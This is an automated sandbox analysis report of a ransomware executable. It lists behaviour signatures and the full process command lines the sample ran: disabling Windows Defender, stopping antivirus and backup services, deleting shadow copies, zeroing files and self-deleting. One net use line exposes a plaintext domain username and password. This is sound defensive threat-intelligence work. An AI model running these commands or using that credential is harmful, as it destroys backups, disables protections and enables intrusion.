Resubmissions

15/03/2025, 09:05

250315-k2fw9asrx6 10

15/03/2025, 03:25

250315-dyre9at1fy 10

Analysis

  • max time kernel
    217s
  • max time network
    300s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    15/03/2025, 09:05

General

  • Target

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe

  • Size

    82KB

  • MD5

    e01e11dca5e8b08fc8231b1cb6e2048c

  • SHA1

    4983d07f004436caa3f10b38adacbba6a4ede01a

  • SHA256

    58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f

  • SHA512

    298bfb9fe55ddd80f1c6671622d7e9e865899a855b5bb8e0d85d8520160cedca6fd8bc72c9881925477bcab883bf6e6f4c69f997b774b74fe992e023a81269de

  • SSDEEP

    1536:PcW4lAJGGnzjoih/NDh/NDuk+XkGAK/hztXcag+PlbBfkWIyvZrw281r5XsmCZEe:UWNGszjoih/NDh/NDuk+XkGAK/hztXcQ

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Maps connected drives based on registry 3 TTPs 3 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 62 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 12 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 43 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
    "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"
    1⤵
    • Modifies Windows Defender DisableAntiSpyware settings
    • Modifies Windows Defender Real-time Protection settings
    • Downloads MZ/PE file
    • Checks computer location settings
    • Drops startup file
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3488
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:4728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:2548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4752
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:1456
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3164
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4240
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
        PID:1096
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          3⤵
            PID:6388
        • C:\Windows\SYSTEM32\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:416
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              3⤵
                PID:6444
            • C:\Windows\SYSTEM32\net.exe
              "net.exe" stop mfewc /y
              2⤵
                PID:3388
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop mfewc /y
                  3⤵
                    PID:6200
                • C:\Windows\SYSTEM32\net.exe
                  "net.exe" stop BMR Boot Service /y
                  2⤵
                    PID:4780
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BMR Boot Service /y
                      3⤵
                        PID:6272
                    • C:\Windows\SYSTEM32\net.exe
                      "net.exe" stop NetBackup BMR MTFTP Service /y
                      2⤵
                        PID:1388
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                          3⤵
                            PID:6380
                        • C:\Windows\SYSTEM32\net.exe
                          "net.exe" stop DefWatch /y
                          2⤵
                            PID:4392
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop DefWatch /y
                              3⤵
                                PID:6216
                            • C:\Windows\SYSTEM32\net.exe
                              "net.exe" stop ccEvtMgr /y
                              2⤵
                                PID:1816
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 stop ccEvtMgr /y
                                  3⤵
                                    PID:6452
                                • C:\Windows\SYSTEM32\net.exe
                                  "net.exe" stop ccSetMgr /y
                                  2⤵
                                    PID:2228
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop ccSetMgr /y
                                      3⤵
                                        PID:6500
                                    • C:\Windows\SYSTEM32\net.exe
                                      "net.exe" stop SavRoam /y
                                      2⤵
                                        PID:4568
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 stop SavRoam /y
                                          3⤵
                                            PID:6240
                                        • C:\Windows\SYSTEM32\net.exe
                                          "net.exe" stop RTVscan /y
                                          2⤵
                                            PID:3780
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop RTVscan /y
                                              3⤵
                                                PID:6264
                                            • C:\Windows\SYSTEM32\net.exe
                                              "net.exe" stop QBFCService /y
                                              2⤵
                                                PID:3776
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 stop QBFCService /y
                                                  3⤵
                                                    PID:6248
                                                • C:\Windows\SYSTEM32\net.exe
                                                  "net.exe" stop QBIDPService /y
                                                  2⤵
                                                    PID:3608
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 stop QBIDPService /y
                                                      3⤵
                                                        PID:6280
                                                    • C:\Windows\SYSTEM32\net.exe
                                                      "net.exe" stop Intuit.QuickBooks.FCS /y
                                                      2⤵
                                                        PID:888
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                          3⤵
                                                            PID:6160
                                                        • C:\Windows\SYSTEM32\net.exe
                                                          "net.exe" stop QBCFMonitorService /y
                                                          2⤵
                                                            PID:3228
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                              3⤵
                                                                PID:6152
                                                            • C:\Windows\SYSTEM32\net.exe
                                                              "net.exe" stop YooBackup /y
                                                              2⤵
                                                                PID:632
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop YooBackup /y
                                                                  3⤵
                                                                    PID:6484
                                                                • C:\Windows\SYSTEM32\net.exe
                                                                  "net.exe" stop YooIT /y
                                                                  2⤵
                                                                    PID:1060
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop YooIT /y
                                                                      3⤵
                                                                        PID:6288
                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                      "net.exe" stop zhudongfangyu /y
                                                                      2⤵
                                                                        PID:3880
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                          3⤵
                                                                            PID:6492
                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                          "net.exe" stop stc_raw_agent /y
                                                                          2⤵
                                                                            PID:4136
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                              3⤵
                                                                                PID:6608
                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                              "net.exe" stop VSNAPVSS /y
                                                                              2⤵
                                                                                PID:1528
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                  3⤵
                                                                                    PID:4764
                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                  "net.exe" stop VeeamTransportSvc /y
                                                                                  2⤵
                                                                                    PID:4608
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                      3⤵
                                                                                        PID:6232
                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                      "net.exe" stop VeeamDeploymentService /y
                                                                                      2⤵
                                                                                        PID:4564
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                          3⤵
                                                                                            PID:6476
                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                          "net.exe" stop VeeamNFSSvc /y
                                                                                          2⤵
                                                                                            PID:2444
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                              3⤵
                                                                                                PID:6468
                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                              "net.exe" stop veeam /y
                                                                                              2⤵
                                                                                                PID:3000
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 stop veeam /y
                                                                                                  3⤵
                                                                                                    PID:6400
                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                  "net.exe" stop PDVFSService /y
                                                                                                  2⤵
                                                                                                    PID:4908
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                      3⤵
                                                                                                        PID:6680
                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                      "net.exe" stop BackupExecVSSProvider /y
                                                                                                      2⤵
                                                                                                        PID:1036
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                          3⤵
                                                                                                            PID:6664
                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                          "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                          2⤵
                                                                                                            PID:4852
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                              3⤵
                                                                                                                PID:6308
                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                              "net.exe" stop BackupExecAgentBrowser /y
                                                                                                              2⤵
                                                                                                                PID:2836
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                  3⤵
                                                                                                                    PID:6672
                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                  "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                  2⤵
                                                                                                                    PID:2168
                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                      3⤵
                                                                                                                        PID:2140
                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                      "net.exe" stop BackupExecJobEngine /y
                                                                                                                      2⤵
                                                                                                                        PID:1336
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                          3⤵
                                                                                                                            PID:6328
                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                          "net.exe" stop BackupExecManagementService /y
                                                                                                                          2⤵
                                                                                                                            PID:3312
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                              3⤵
                                                                                                                                PID:6428
                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                              "net.exe" stop BackupExecRPCService /y
                                                                                                                              2⤵
                                                                                                                                PID:1316
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                  3⤵
                                                                                                                                    PID:6320
                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                  "net.exe" stop AcrSch2Svc /y
                                                                                                                                  2⤵
                                                                                                                                    PID:4328
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                      3⤵
                                                                                                                                        PID:6520
                                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                                      "net.exe" stop AcronisAgent /y
                                                                                                                                      2⤵
                                                                                                                                        PID:1636
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                          3⤵
                                                                                                                                            PID:6296
                                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                                          "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                          2⤵
                                                                                                                                            PID:4364
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                              3⤵
                                                                                                                                                PID:6528
                                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                                              "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                              2⤵
                                                                                                                                                PID:3696
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                                  3⤵
                                                                                                                                                    PID:6224
                                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                  "net.exe" stop sophos /y
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3904
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop sophos /y
                                                                                                                                                      3⤵
                                                                                                                                                        PID:6536
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:3152
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:3464
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLWriter start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:2540
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1116
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:1152
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2488
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2976
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:5116
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:340
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3472
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1508
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2156
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3204
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1972
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1956
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1780
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1612
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1076
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2036
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1824
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1696
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2136
                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                        "net.exe" use \\10.127.0.190 /USER:SHJPOLICE\amer !Omar2012
                                                                                                                                                        2⤵
                                                                                                                                                          PID:6828
                                                                                                                                                        • C:\Windows\System32\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                          2⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          PID:5312
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                          2⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          PID:5316
                                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                                            ping 127.0.0.7 -n 3
                                                                                                                                                            3⤵
                                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:6272
                                                                                                                                                          • C:\Windows\system32\fsutil.exe
                                                                                                                                                            fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6488
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe
                                                                                                                                                            2⤵
                                                                                                                                                              PID:5320
                                                                                                                                                              • C:\Windows\system32\choice.exe
                                                                                                                                                                choice /C Y /N /D Y /T 3
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6204
                                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6296
                                                                                                                                                              • C:\Windows\system32\werfault.exe
                                                                                                                                                                werfault.exe /h /shared Global\4c7b7ba181a5497ba0a3194aec3f3344 /t 5492 /p 5312
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:5888
                                                                                                                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Opens file in notepad (likely ransom note)
                                                                                                                                                                  PID:6100
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                  PID:6128
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff88a8bdcf8,0x7ff88a8bdd04,0x7ff88a8bdd10
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:704
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,15626820768800121939,8248636772612762649,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:2
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:1404
